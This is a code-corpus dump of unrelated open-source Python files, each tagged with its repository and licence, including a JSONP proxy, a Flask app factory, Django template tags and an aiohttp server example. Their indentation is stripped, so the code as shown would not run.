"""A proxy that validates JSON, localizes it, and returns JSON or JSONP."""
__author__ = 'kpy@google.com (Ka-Ping Yee)'
import httplib
import json
import logging
import pickle
import re
import urlparse
import base_handler
from google.appengine.api import memcache
from google.appengine.api import urlfetch
CACHE_SECONDS = 120 # seconds to cache each fetched URL
MAX_OUTBOUND_QPM_PER_IP = 30 # maximum outbound HTTP fetches/min per client IP
HTTP_TOO_MANY_REQUESTS = 429 # this HTTP status code is not defined in httplib
# Regular expression for a JSON string enclosed by a JavaScript function call.
# \w+ is broader than the official definition of a JavaScript identifier,
# but it's safe to be broad in what we match, since we're removing it.
JSON_CALLBACK_RE = re.compile(r'^\w+\((.*)\)[\s;]*$', re.UNICODE | re.DOTALL)
def SanitizeUrl(url):
"""Checks and returns a URL that is safe to fetch, or raises an error.
Args:
url: A URL.
Returns:
The URL, only if it is considered safe to fetch.
Raises:
base_handler.Error: The URL was missing or not safe to fetch.
"""
scheme, netloc, path, query, _ = urlparse.urlsplit(url)
if scheme in ['http', 'https'] and '.' in netloc:
return urlparse.urlunsplit((scheme, netloc, path, query, ''))
raise base_handler.Error(httplib.BAD_REQUEST, 'Missing or invalid URL.')
def ParseJson(json_string):
"""Parses a JSON or JSONP string and returns the parsed object."""
match = JSON_CALLBACK_RE.match(json_string)
if match:
json_string = match.group(1) # remove the function call around the JSON
try:
return json.loads(json_string)
except (TypeError, ValueError):
raise base_handler.Error(httplib.FORBIDDEN, 'Invalid JSON.')
def AssertRateLimitNotExceeded(client_ip):
"""Raises an error if the given IP exceeds its allowed request rate."""
cache_key = pickle.dumps(('jsonp.qpm', client_ip))
if memcache.get(cache_key) >= MAX_OUTBOUND_QPM_PER_IP:
raise base_handler.Error(HTTP_TOO_MANY_REQUESTS,
'Rate limit exceeded; please try again later.')
memcache.add(cache_key, 0, 60)
memcache.incr(cache_key)
def FetchJson(url, post_json, use_cache, client_ip, referrer=None):
"""Fetches a URL, parses it as JSON, and caches the resulting object.
Args:
url: A string, the URL to fetch.
post_json: An optional string. If specified, we do a POST instead of a
GET, and post this data with Content-Type: application/json.
use_cache: A boolean; if true, look in the cache, and if cached data is
present, return that instead of actually performing the fetch.
client_ip: A string, the IP address of the client. If the fetch rate per
client exceeds MAX_OUTBOUND_QPM_PER_IP requests per minute, we abort.
referrer: An optional string, the "Referer:" header to use in the request.
Returns:
A dictionary or list parsed from the fetched JSON.
Raises:
base_handler.Error: The request failed or exceeded the rate limit.
"""
url = SanitizeUrl(url)
cache_key = pickle.dumps(('jsonp.content', url, post_json))
value = None
if use_cache:
value = memcache.get(cache_key)
if value is None:
AssertRateLimitNotExceeded(client_ip)
method = post_json and 'POST' or 'GET'
headers = post_json and {'Content-Type': 'application/json'} or {}
if referrer:
headers['Referer'] = referrer
result = urlfetch.fetch(url, post_json, method, headers)
if result.status_code != httplib.OK:
logging.warn('Request for url=%r post_json=%r returned status %r: %r',
url, post_json, result.status_code, result.content)
raise base_handler.Error(result.status_code, 'Request failed.')
value = ParseJson(result.content)
memcache.set(cache_key, value, CACHE_SECONDS)
return value
def PopLocalizedChild(parent, field_name, lang):
"""Finds and removes a localized child object in a MapRoot data structure.
Both MapRoot and Layer structures have a field ("localized_map_roots" or
"localized_layers") that contains an array of localized versions of the
MapRoot or Layer object. Each element of the array is a dictionary with a
"language" key and a "map_root" key, or a "language" key and a "layer" key.
This function finds the localized MapRoot or Layer object for a given
language, returns it, and removes the array of all the localizations from
the parent object.
Args:
parent: A MapRoot or Layer structure, as a Python dictionary.
field_name: A string, either "map_root" or "layer".
lang: The language code to look for in the "language" field.
Returns:
The child MapRoot or Layer object containing localized fields.
"""
for localization in parent.pop('localized_%ss' % field_name, ()):
if localization.get('language') == lang:
return localization.get(field_name, {})
def LocalizeLayer(layer, lang):
"""Localizes a Layer object in place and discards unused localizations.
Args:
layer: A Layer structure as a dictionary, to be modified in place.
lang: A string, the language code for the language to localize to.
"""
layer.update(PopLocalizedChild(layer, 'layer', lang) or {})
for sublayer in layer.get('sublayers', ()):
LocalizeLayer(sublayer, lang)
def LocalizeMapRoot(map_root, lang):
"""Localizes a MapRoot object in place and discards unused localizations.
Args:
map_root: A MapRoot structure as a dictionary, to be modified in place.
lang: A string, the language code for the language to localize to.
"""
map_root.update(PopLocalizedChild(map_root, 'map_root', lang) or {})
for layer in map_root.get('layers', ()):
LocalizeLayer(layer, lang)
class Jsonp(base_handler.BaseHandler):
"""A proxy that validates JSON, localizes it, and returns JSON or JSONP.
Accepts these query parameters:
- url: Required. A URL from which to fetch JSON. The URL must provide
syntactically valid JSON, or valid JSON wrapped in a function call.
- post_json: Optional. If non-empty, we do a POST instead of a GET and
send this data with Content-Type: application/json.
- no_cache: Optional. If specified, we fetch the JSON directly from the
source URL instead of consulting the cache (up to CACHE_SECONDS old).
- callback: Optional. A callback function name. If provided, the
returned JSON is wrapped in a JavaScript function call.
- hl: Optional. A BCP 47 language code. If specified, the JSON is
treated as MapRoot and localized to the specified language, and the
localizations for other languages are discarded.
"""
# This class needs no __init__ method. # pylint: disable=no-init
def Get(self):
url = self.request.get('url', '')
post_json = self.request.get('post_json', '')
use_cache = not self.request.get('no_cache')
hl = self.request.get('hl', '')
data = FetchJson(url, post_json, use_cache, self.request.remote_addr,
self.request.headers.get('Referer'))
if hl:
LocalizeMapRoot(data, hl)
self.WriteJson(data)
| AppScale/crisismap | jsonp.py | Python | apache-2.0 | 7,687 |
# encoding: utf-8
'''
@author: Jose Emilio Romero Lopez
@copyright: Copyright 2013-2014, Jose Emilio Romero Lopez.
@license: GPL
@contact: jemromerol@gmail.com
This file is part of APASVO.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
from PySide import QtGui
from apasvo.gui.views.generated import ui_loaddialog
from apasvo.utils.formats import rawfile
FORMATS = {'Autodetect': None,
'Binary': rawfile.format_binary,
'Text': rawfile.format_text,
}
DEFAULT_FORMAT = 'Autodetect'
DTYPES = (rawfile.datatype_int16,
rawfile.datatype_int32,
rawfile.datatype_int64,
rawfile.datatype_float16,
rawfile.datatype_float32,
rawfile.datatype_float64, )
DTYPES_LABELS = ('16 bits, PCM',
'32 bits, PCM',
'64 bits, PCM',
'16 bits, float',
'32 bits, float',
'64 bits, float', )
BYTEORDERS = (rawfile.byteorder_little_endian,
rawfile.byteorder_big_endian)
class LoadDialog(QtGui.QDialog, ui_loaddialog.Ui_LoadDialog):
"""A dialog window to load seismic data stored in a binary or text file.
Allows the user to choose several settings in order to load a seismic
signal, i.e.:
Format: Binary or text format.
Data-type: Float16, Float32 or Float64,
Endianness: Little-endian or big-endian.
Sample rate.
The class also infers the right parameters for the chosen file and shows
a preview of the loaded data for the selected parameters.
Attributes:
filename: Name of the opened file.
"""
def __init__(self, parent, filename):
super(LoadDialog, self).__init__(parent)
self.setupUi(self)
self.FileFormatComboBox.currentIndexChanged.connect(self.on_format_change)
self.FileFormatComboBox.currentIndexChanged.connect(self.load_preview)
self.DataTypeComboBox.currentIndexChanged.connect(self.load_preview)
self.ByteOrderComboBox.currentIndexChanged.connect(self.load_preview)
# init file format combobox
self.FileFormatComboBox.addItems(FORMATS.keys())
self.FileFormatComboBox.setCurrentIndex(FORMATS.keys().index(DEFAULT_FORMAT))
# init datatype combobox
self.DataTypeComboBox.addItems(DTYPES_LABELS)
self.DataTypeComboBox.setCurrentIndex(DTYPES.index(rawfile.datatype_float64))
self.filename = filename
self.load_preview()
def on_format_change(self, idx):
"""Updates UI after toggling the format value."""
fmt = FORMATS[self.FileFormatComboBox.currentText()]
if fmt == rawfile.format_binary:
self.DataTypeComboBox.setVisible(True)
self.DataTypeLabel.setVisible(True)
self.ByteOrderComboBox.setVisible(True)
self.ByteOrderLabel.setVisible(True)
self.groupBox_2.setVisible(True)
self.SampleFrequencySpinBox.setVisible(True)
self.SampleFrequencyLabel.setVisible(True)
elif fmt == rawfile.format_text:
self.DataTypeComboBox.setVisible(False)
self.DataTypeLabel.setVisible(False)
self.ByteOrderComboBox.setVisible(False)
self.ByteOrderLabel.setVisible(False)
self.groupBox_2.setVisible(True)
self.SampleFrequencySpinBox.setVisible(True)
self.SampleFrequencyLabel.setVisible(True)
else:
self.DataTypeComboBox.setVisible(False)
self.DataTypeLabel.setVisible(False)
self.ByteOrderComboBox.setVisible(False)
self.ByteOrderLabel.setVisible(False)
self.groupBox_2.setVisible(False)
self.SampleFrequencySpinBox.setVisible(False)
self.SampleFrequencyLabel.setVisible(False)
self.groupBox.adjustSize()
self.adjustSize()
def load_preview(self):
"""Shows a preview of loaded data using the selected parameters."""
# Load parameters
values = self.get_values()
try:
# Set up a file handler according to the type of raw data (binary or text)
fhandler = rawfile.get_file_handler(self.filename, **values)
# Print data preview
array = fhandler.read_in_blocks().next()
data = ''
for x in array:
data += ("%g\n" % x)
except:
data = '*** There was a problem reading the file content ***'
self.buttonBox.button(QtGui.QDialogButtonBox.Ok).setEnabled(False)
else:
self.buttonBox.button(QtGui.QDialogButtonBox.Ok).setEnabled(True)
self.PreviewTextEdit.clear()
self.PreviewTextEdit.setText(data)
def get_values(self):
"""Gets selected parameters."""
return {'fmt': FORMATS[self.FileFormatComboBox.currentText()],
'dtype': DTYPES[self.DataTypeComboBox.currentIndex()],
'byteorder': BYTEORDERS[self.ByteOrderComboBox.currentIndex()],
'fs': float(self.SampleFrequencySpinBox.value())}
| jemromerol/apasvo | apasvo/gui/views/loaddialog.py | Python | gpl-3.0 | 5,689 |
# Copyright 2011 Sebastien Maccagnoni-Munch
#
# This file is part of Omoma.
#
# Omoma is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3.
#
# Omoma is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Omoma. If not, see <http://www.gnu.org/licenses/>.
"""
Django template tags for Omoma
"""
| TheGU/omoma | omoma/omoma_web/templatetags/__init__.py | Python | gpl-3.0 | 666 |
# Lint as: python3
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Base configurations to standardize experiments."""
from __future__ import absolute_import
from __future__ import division
from __future__ import REDACTED
from __future__ import print_function
import copy
from typing import Any, List, Mapping, Optional
import REDACTED
import dataclasses
import tensorflow as tf
import yaml
from REDACTED.tf2_common.modeling.hyperparams import params_dict
@dataclasses.dataclass
class Config(params_dict.ParamsDict):
"""The base configuration class that supports YAML/JSON based overrides."""
default_params: dataclasses.InitVar[Mapping[str, Any]] = None
restrictions: dataclasses.InitVar[List[str]] = None
def __post_init__(self, default_params, restrictions, *args, **kwargs):
super().__init__(default_params=default_params,
restrictions=restrictions,
*args,
**kwargs)
def _set(self, k, v):
if isinstance(v, dict):
if k not in self.__dict__:
self.__dict__[k] = params_dict.ParamsDict(v, [])
else:
self.__dict__[k].override(v)
else:
self.__dict__[k] = copy.deepcopy(v)
def __setattr__(self, k, v):
if k in params_dict.ParamsDict.RESERVED_ATTR:
# Set the essential private ParamsDict attributes.
self.__dict__[k] = copy.deepcopy(v)
else:
self._set(k, v)
def replace(self, **kwargs):
"""Like `override`, but returns a copy with the current config unchanged."""
params = self.__class__(self)
params.override(kwargs, is_strict=True)
return params
@classmethod
def from_yaml(cls, file_path: str):
# Note: This only works if the Config has all default values.
with tf.io.gfile.GFile(file_path, 'r') as f:
loaded = yaml.load(f)
config = cls()
config.override(loaded)
return config
@classmethod
def from_json(cls, file_path: str):
"""Wrapper for `from_yaml`."""
return cls.from_yaml(file_path)
@classmethod
def from_args(cls, *args, **kwargs):
"""Builds a config from the given list of arguments."""
attributes = list(cls.__annotations__.keys())
default_params = {a: p for a, p in zip(attributes, args)}
default_params.update(kwargs)
return cls(default_params)
| mlperf/training_results_v0.7 | Google/benchmarks/bert/implementations/bert-cloud-TF2.0-tpu-v3-32/tf2_common/modeling/hyperparams/base_config.py | Python | apache-2.0 | 2,947 |
from flask import Flask, render_template
from flask.ext.bootstrap import Bootstrap
from flask.ext.moment import Moment
from flask.ext.sqlalchemy import SQLAlchemy
from flask.ext.login import LoginManager
from flask.ext.uploads import UploadSet, configure_uploads, IMAGES
from config import config
bootstrap = Bootstrap()
moment = Moment()
db = SQLAlchemy()
login_manager = LoginManager()
login_manager.session_protection = 'strong'
login_manager.login_view = 'auth.login'
avatars = UploadSet('avatars', IMAGES)
def create_app(config_name):
app = Flask(__name__)
app.config.from_object(config[config_name])
config[config_name].init_app(app)
bootstrap.init_app(app)
moment.init_app(app)
db.init_app(app)
login_manager.init_app(app)
configure_uploads(app, (avatars))
from .main import main as main_blueprint
from .auth import auth as auth_blueprint
from .admin import admin as admin_blueprint
app.register_blueprint(main_blueprint)
app.register_blueprint(auth_blueprint, url_prefix='/auth')
app.register_blueprint(admin_blueprint, url_prefix='/admin')
return app
| chenke91/ihaveablog | app/__init__.py | Python | mit | 1,126 |
__author__ = "Jerome Kieffer"
__license__ = "MIT"
__copyright__ = "2017, ESRF"
import numpy
from math import log
from .collections import GOF
from ._cormap import measure_longest
class LongestRunOfHeads(object):
"""Implements the "longest run of heads" by Mark F. Schilling
The College Mathematics Journal, Vol. 21, No. 3, (1990), pp. 196-207
See: http://www.maa.org/sites/default/files/pdf/upload_library/22/Polya/07468342.di020742.02p0021g.pdf
"""
def __init__(self):
"We store already calculated values for (n,c)"
self.knowledge = {}
def A(self, n, c):
"""Calculate A(number_of_toss, length_of_longest_run)
:param n: number of coin toss in the experiment, an integer
:param c: length of the longest run of
:return: The A parameter used in the formula
"""
if n <= c:
return 2 ** n
elif (n, c) in self.knowledge:
return self.knowledge[(n, c)]
else:
s = 0
for j in range(c, -1, -1):
s += self.A(n - 1 - j, c)
self.knowledge[(n, c)] = s
return s
def B(self, n, c):
"""Calculate B(number_of_toss, length_of_longest_run)
to have either a run of Heads either a run of Tails
:param n: number of coin toss in the experiment, an integer
:param c: length of the longest run of
:return: The B parameter used in the formula
"""
return 2 * self.A(n - 1, c - 1)
def __call__(self, n, c):
"""Calculate the probability for the longest run of heads to exceed the observed length
:param n: number of coin toss in the experiment, an integer
:param c: length of the longest run of heads, an integer
:return: The probablility of having c subsequent heads in a n toss of fair coin
"""
if c >= n:
return 0
delta = 2 ** n - self.A(n, c)
if delta <= 0:
return 0
return 2.0 ** (log(delta, 2) - n)
def probaHeadOrTail(self, n, c):
"""Calculate the probability of a longest run of head or tails to occur
:param n: number of coin toss in the experiment, an integer
:param c: length of the longest run of heads or tails, an integer
:return: The probablility of having c subsequent heads or tails in a n toss of fair coin
"""
if c > n:
return 0
if c == 0:
return 0
delta = self.B(n, c) - self.B(n, c - 1)
if delta <= 0:
return 0
return min(2.0 ** (log(delta, 2.0) - n), 1.0)
def probaLongerRun(self, n, c):
"""Calculate the probability for the longest run of heads or tails to exceed the observed length
:param n: number of coin toss in the experiment, an integer
:param c: length of thee observed run of heads or tails, an integer
:return: The probablility of having more than c subsequent heads or tails in a n toss of fair coin
"""
if c > n:
return 0
if c == 0:
return 0
delta = (2 ** n) - self.B(n, c)
if delta <= 0:
return 0
return min(2.0 ** (log(delta, 2.0) - n), 1.0)
LROH = LongestRunOfHeads()
def gof(data1, data2):
"""Calculate the probability for a couple of dataset to be equivalent
Implementation according to:
http://www.nature.com/nmeth/journal/v12/n5/full/nmeth.3358.html
:param data1: numpy array
:param data2: numpy array
:return: probablility for the 2 data to be equivalent
"""
if data1.ndim == 2 and data1.shape[1] > 1:
data1 = data1[:, 1]
if data2.ndim == 2 and data2.shape[1] > 1:
data2 = data2[:, 1]
cdata = numpy.ascontiguousarray(data2 - data1, numpy.float64).ravel()
c = measure_longest(cdata)
n = cdata.size
res = GOF(n, c, LROH.probaLongerRun(n, c - 1))
return res
| kif/freesas | freesas/cormap.py | Python | mit | 4,026 |
import os
from PIL import Image
import numpy as np
from tvm.contrib.download import download_testdata
def get_mobilenet():
url = 'https://docs-assets.developer.apple.com/coreml/models/MobileNet.mlmodel'
dst = 'mobilenet.mlmodel'
real_dst = download_testdata(url, dst, module='coreml')
return os.path.abspath(real_dst)
def get_resnet50():
url = 'https://docs-assets.developer.apple.com/coreml/models/Resnet50.mlmodel'
dst = 'resnet50.mlmodel'
real_dst = download_testdata(url, dst, module='coreml')
return os.path.abspath(real_dst)
def get_cat_image():
url = 'https://gist.githubusercontent.com/zhreshold/bcda4716699ac97ea44f791c24310193/raw/fa7ef0e9c9a5daea686d6473a62aacd1a5885849/cat.png'
dst = 'cat.png'
real_dst = download_testdata(url, dst, module='data')
img = Image.open(real_dst).resize((224, 224))
# CoreML's standard model image format is BGR
img_bgr = np.array(img)[:, :, ::-1]
img = np.transpose(img_bgr, (2, 0, 1))[np.newaxis, :]
return np.asarray(img) | Huyuwei/tvm | tests/python/frontend/coreml/model_zoo/__init__.py | Python | apache-2.0 | 1,032 |
import random
from hashlib import sha256
from urllib.parse import urlencode, urlparse
from django import template
from django.conf import settings
from django.http import HttpRequest
from django.utils.http import urlquote
from django.utils.safestring import SafeData, mark_safe
from core.utils import sanitize_next
register = template.Library()
@register.simple_tag
def random_identifier(length=None):
try:
length = int(length)
except Exception:
length = None
if length is None or length <= 0:
length = random.randint(16, 48)
return ''.join(random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz123456789_')
for n in range(length))
@register.filter(is_safe=True)
def public_id(account):
try:
return sha256(str(account.pk).encode() + str(account.date_joined).encode()).hexdigest()
except Exception:
return ''
register.simple_tag(func=lambda *args: list(args), name='list')
register.simple_tag(func=lambda **kwargs: dict(kwargs), name='dict')
@register.filter(is_safe=True)
def are_any(iterable):
try:
return any(iterable)
except (ValueError, TypeError):
return bool(iterable)
@register.filter(is_safe=True)
def are_all(iterable):
try:
return all(iterable)
except (ValueError, TypeError):
return bool(iterable)
@register.filter(is_safe=False)
def split(value, by=None):
"""
A template filter to split objects (commonly, strings) by the given argument. A missing argument will split the
object by any whitespace; if the object cannot be split, it will be wrapped in a list. Strings marked as "safe"
by Django will still have their parts correctly marked in the resulting list.
If the argument is of the form 'separator~number', the resulting chunks will have a maximum length of `number`;
this means that to use a tilde as separator, it must be doubled: '~~'. The chunking will also un-mark the parts
as "safe" because it might cut HTML tags into several (not-safe-anymore) pieces; Use only for plain text.
"""
try:
length = None
if by == 'NEWLINE':
by = '\n'
if by and isinstance(by, str) and '~' in by:
by, length = by.rsplit('~', maxsplit=1)
try:
length = abs(int(length))
except ValueError:
length = None
parts = value.split(by)
except (ValueError, TypeError, AttributeError):
parts = [value]
if isinstance(value, SafeData):
parts = [mark_safe(part) for part in parts]
if length:
parts = [[part[i:i+length] for i in range(0, len(part), length)] if part else [part] for part in parts]
return [chunk for part_chunks in parts for chunk in part_chunks]
else:
return parts
@register.filter(is_safe=False)
def mult(value, by):
try:
return value * int(by)
except (ValueError, TypeError):
return ''
@register.filter(is_safe=True)
@template.defaultfilters.stringfilter
def compact(value):
"""
A template filter that removes all extra whitespace from the value it is applied to, and strips any whitespace
at the beginning and at the end of the resulting string. Any characters that can role as whitespace (including
new lines) are replaced by a space and collapsed.
"""
return ' '.join(value.split())
@register.simple_tag(name='next', takes_context=True)
def next_link(
context,
proceed_to, proceed_to_anchor=None, proceed_to_anchor_id=None,
url_only=False, default=''):
"""
A template tag used to provide the properly encoded redirection target parameter for URLs. The target can be
specified directly, or via the tokens 'this page' (meaning, the current page's URL will be used) or 'next page'
(meaning, the value from current page's redirection parameter will be used). In the latter case, the target
value is verified prior to use; an unsafe value is ignored. The additional parameters:
- url_only: causes the tag to output only the calculated target's URL, without encoding for a Query String.
- default: provides a default value to output in case the indicated redirection target is empty or unsafe.
"""
if str(proceed_to).startswith('#'):
proceed_to_anchor_id, proceed_to_anchor, proceed_to = proceed_to_anchor, proceed_to, 'this page'
if isinstance(context, HttpRequest):
context = {'request': context}
url_param = ''
if proceed_to == "this page":
if 'request' in context:
url_param = context['request'].get_full_path()
elif proceed_to == "next page":
if 'request' in context:
url_param = sanitize_next(context['request'])
else:
url_param = proceed_to
url_param_value = ''.join([
str(url_param),
str(proceed_to_anchor) if proceed_to_anchor else '',
str(proceed_to_anchor_id) if proceed_to_anchor and proceed_to_anchor_id else '',
]) if url_param else default
if not url_only and url_param_value:
return urlencode(
{settings.REDIRECT_FIELD_NAME: url_param_value},
quote_via=lambda v, *args: urlquote(v, safe='')
)
else:
return url_param_value or ''
@register.simple_tag(name='previous', takes_context=True)
def previous_link(context, default=''):
"""
A template tag used to provide the properly verified redirection target for going back to the previously
visited page.
- default: provides a default value to output in case the redirection target is empty or unsafe.
"""
url_param_value = ''
if 'request' in context:
referrer_url = context['request'].META.get('HTTP_REFERER', '')
url_param_value = sanitize_next(context['request'], url=referrer_url)
return urlparse(url_param_value).path or default
| tejoesperanto/pasportaservo | core/templatetags/utils.py | Python | agpl-3.0 | 5,909 |
#!/usr/bin/env python3
"""Simple multiprocess HTTP server written using an event loop."""
import argparse
import os
import socket
import signal
import time
import asyncio
import aiohttp
import aiohttp.server
from aiohttp import websocket
ARGS = argparse.ArgumentParser(description="Run simple HTTP server.")
ARGS.add_argument(
'--host', action="store", dest='host',
default='127.0.0.1', help='Host name')
ARGS.add_argument(
'--port', action="store", dest='port',
default=8080, type=int, help='Port number')
ARGS.add_argument(
'--workers', action="store", dest='workers',
default=2, type=int, help='Number of workers.')
class HttpRequestHandler(aiohttp.server.ServerHttpProtocol):
@asyncio.coroutine
def handle_request(self, message, payload):
print('{}: method = {!r}; path = {!r}; version = {!r}'.format(
os.getpid(), message.method, message.path, message.version))
path = message.path
if (not (path.isprintable() and path.startswith('/')) or '/.' in path):
path = None
else:
path = '.' + path
if not os.path.exists(path):
path = None
else:
isdir = os.path.isdir(path)
if not path:
raise aiohttp.HttpProcessingError(code=404)
if isdir and not path.endswith('/'):
path = path + '/'
raise aiohttp.HttpProcessingError(
code=302, headers=(('URI', path), ('Location', path)))
response = aiohttp.Response(
self.writer, 200, http_version=message.version)
response.add_header('Transfer-Encoding', 'chunked')
# content encoding
accept_encoding = message.headers.get('accept-encoding', '').lower()
if 'deflate' in accept_encoding:
response.add_header('Content-Encoding', 'deflate')
response.add_compression_filter('deflate')
elif 'gzip' in accept_encoding:
response.add_header('Content-Encoding', 'gzip')
response.add_compression_filter('gzip')
response.add_chunking_filter(1025)
if isdir:
response.add_header('Content-type', 'text/html')
response.send_headers()
response.write(b'<ul>\r\n')
for name in sorted(os.listdir(path)):
if name.isprintable() and not name.startswith('.'):
try:
bname = name.encode('ascii')
except UnicodeError:
pass
else:
if os.path.isdir(os.path.join(path, name)):
response.write(b'<li><a href="' + bname +
b'/">' + bname + b'/</a></li>\r\n')
else:
response.write(b'<li><a href="' + bname +
b'">' + bname + b'</a></li>\r\n')
response.write(b'</ul>')
else:
response.add_header('Content-type', 'text/plain')
response.send_headers()
try:
with open(path, 'rb') as fp:
chunk = fp.read(8192)
while chunk:
response.write(chunk)
chunk = fp.read(8192)
except OSError:
response.write(b'Cannot open')
yield from response.write_eof()
if response.keep_alive():
self.keep_alive(True)
class ChildProcess:
def __init__(self, up_read, down_write, args, sock):
self.up_read = up_read
self.down_write = down_write
self.args = args
self.sock = sock
def start(self):
# start server
self.loop = loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
def stop():
self.loop.stop()
os._exit(0)
loop.add_signal_handler(signal.SIGINT, stop)
f = loop.create_server(
lambda: HttpRequestHandler(debug=True, keep_alive=75),
sock=self.sock)
srv = loop.run_until_complete(f)
x = srv.sockets[0]
print('Starting srv worker process {} on {}'.format(
os.getpid(), x.getsockname()))
# heartbeat
asyncio.async(self.heartbeat())
asyncio.get_event_loop().run_forever()
os._exit(0)
@asyncio.coroutine
def heartbeat(self):
# setup pipes
read_transport, read_proto = yield from self.loop.connect_read_pipe(
aiohttp.StreamProtocol, os.fdopen(self.up_read, 'rb'))
write_transport, _ = yield from self.loop.connect_write_pipe(
aiohttp.StreamProtocol, os.fdopen(self.down_write, 'wb'))
reader = read_proto.reader.set_parser(websocket.WebSocketParser)
writer = websocket.WebSocketWriter(write_transport)
while True:
try:
msg = yield from reader.read()
except:
print('Supervisor is dead, {} stopping...'.format(os.getpid()))
self.loop.stop()
break
if msg.tp == websocket.MSG_PING:
writer.pong()
elif msg.tp == websocket.MSG_CLOSE:
break
read_transport.close()
write_transport.close()
class Worker:
_started = False
def __init__(self, loop, args, sock):
self.loop = loop
self.args = args
self.sock = sock
self.start()
def start(self):
assert not self._started
self._started = True
up_read, up_write = os.pipe()
down_read, down_write = os.pipe()
args, sock = self.args, self.sock
pid = os.fork()
if pid:
# parent
os.close(up_read)
os.close(down_write)
asyncio.async(self.connect(pid, up_write, down_read))
else:
# child
os.close(up_write)
os.close(down_read)
# cleanup after fork
asyncio.set_event_loop(None)
# setup process
process = ChildProcess(up_read, down_write, args, sock)
process.start()
@asyncio.coroutine
def heartbeat(self, writer):
while True:
yield from asyncio.sleep(15)
if (time.monotonic() - self.ping) < 30:
writer.ping()
else:
print('Restart unresponsive worker process: {}'.format(
self.pid))
self.kill()
self.start()
return
@asyncio.coroutine
def chat(self, reader):
while True:
try:
msg = yield from reader.read()
except:
print('Restart unresponsive worker process: {}'.format(
self.pid))
self.kill()
self.start()
return
if msg.tp == websocket.MSG_PONG:
self.ping = time.monotonic()
@asyncio.coroutine
def connect(self, pid, up_write, down_read):
# setup pipes
read_transport, proto = yield from self.loop.connect_read_pipe(
aiohttp.StreamProtocol, os.fdopen(down_read, 'rb'))
write_transport, _ = yield from self.loop.connect_write_pipe(
aiohttp.StreamProtocol, os.fdopen(up_write, 'wb'))
# websocket protocol
reader = proto.reader.set_parser(websocket.WebSocketParser)
writer = websocket.WebSocketWriter(write_transport)
# store info
self.pid = pid
self.ping = time.monotonic()
self.rtransport = read_transport
self.wtransport = write_transport
self.chat_task = asyncio.Task(self.chat(reader))
self.heartbeat_task = asyncio.Task(self.heartbeat(writer))
def kill(self):
self._started = False
self.chat_task.cancel()
self.heartbeat_task.cancel()
self.rtransport.close()
self.wtransport.close()
os.kill(self.pid, signal.SIGTERM)
class Supervisor:
def __init__(self, args):
self.loop = asyncio.get_event_loop()
self.args = args
self.workers = []
def start(self):
# bind socket
sock = self.sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((self.args.host, self.args.port))
sock.listen(1024)
sock.setblocking(False)
# start processes
for idx in range(self.args.workers):
self.workers.append(Worker(self.loop, self.args, sock))
self.loop.add_signal_handler(signal.SIGINT, lambda: self.loop.stop())
self.loop.run_forever()
def main():
if getattr(os, "fork", None) is None:
print("os.fork isn't supported by your OS")
return
args = ARGS.parse_args()
if ':' in args.host:
args.host, port = args.host.split(':', 1)
args.port = int(port)
supervisor = Supervisor(args)
supervisor.start()
if __name__ == '__main__':
main()
| vaskalas/aiohttp | examples/mpsrv.py | Python | apache-2.0 | 9,115 |
"""
Overview
========
Tabs are a great feature when manipulating several files. This plugin implements Key-Commands to create,
open files, change the focus between opened tabs.
Key-Commands
============
Namespace: tabs
Mode: Global
Event: <Alt-comma>
Description: It pops a file selection window to load the contents of a file in a new tab.
Mode: Global
Event: <Alt-period>
Description: It creates a new blank tab.
Mode: Global
Event: <Alt-x>
Description: It removes the focused tab.
Mode: Global
Event: <Alt-o>
Description: It changes the focus left from a tab.
Mode: Global
Event: <Alt-p>
Description: It changes the focus right from a tab.
"""
from vyapp.app import root
from tkinter.messagebox import *
from tkinter.filedialog import askopenfilename, asksaveasfilename
from vyapp.areavi import AreaVi
def load_tab():
"""
It pops a askopenfilename window to drop
the contents of a file into another tab's text area.
"""
filename = askopenfilename()
# If i don't check it ends up cleaning up
# the text area when one presses cancel.
if not filename:
return 'break'
try:
root.note.load([ [filename] ])
except Exception:
root.status.set_msg('It failed to load.')
else:
root.status.set_msg('File loaded.')
return 'break'
def create_tab():
root.note.create('none')
return 'break'
def remove_tab():
"""
It removes the selected tab.
"""
if len(root.note.tabs()) <= 1: return
name = root.note.select()
wid = root.note.nametowidget(name)
wid.destroy()
root.note.select(0)
root.note.set_area_focus()
# We don't need to call forget after destroy.
# It seems the method forget from note doesnt destroy
# the widget at all consequently the event <Destroy> isn't
# spreaded.
# root.note.forget(wid)
return 'break'
def select_left():
"""
"""
root.note.select(root.note.index(root.note.select()) - 1)
root.note.set_area_focus()
return 'break'
def select_right():
"""
"""
root.note.select(root.note.index(root.note.select()) + 1)
root.note.set_area_focus()
return 'break'
def install(area):
area.install('tabs', (-1, '<Alt-comma>', lambda event: load_tab()),
(-1, '<Alt-period>', lambda event: create_tab()),
(-1, '<Alt-x>', lambda event: remove_tab()),
(-1, '<Alt-o>', lambda event: select_left()),
(-1, '<Alt-p>', lambda event: select_right()))
| iogf/vy | vyapp/plugins/tabs.py | Python | mit | 2,532 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# screw_maker2_0.py
#
"""
Macro to generate screws with FreeCAD.
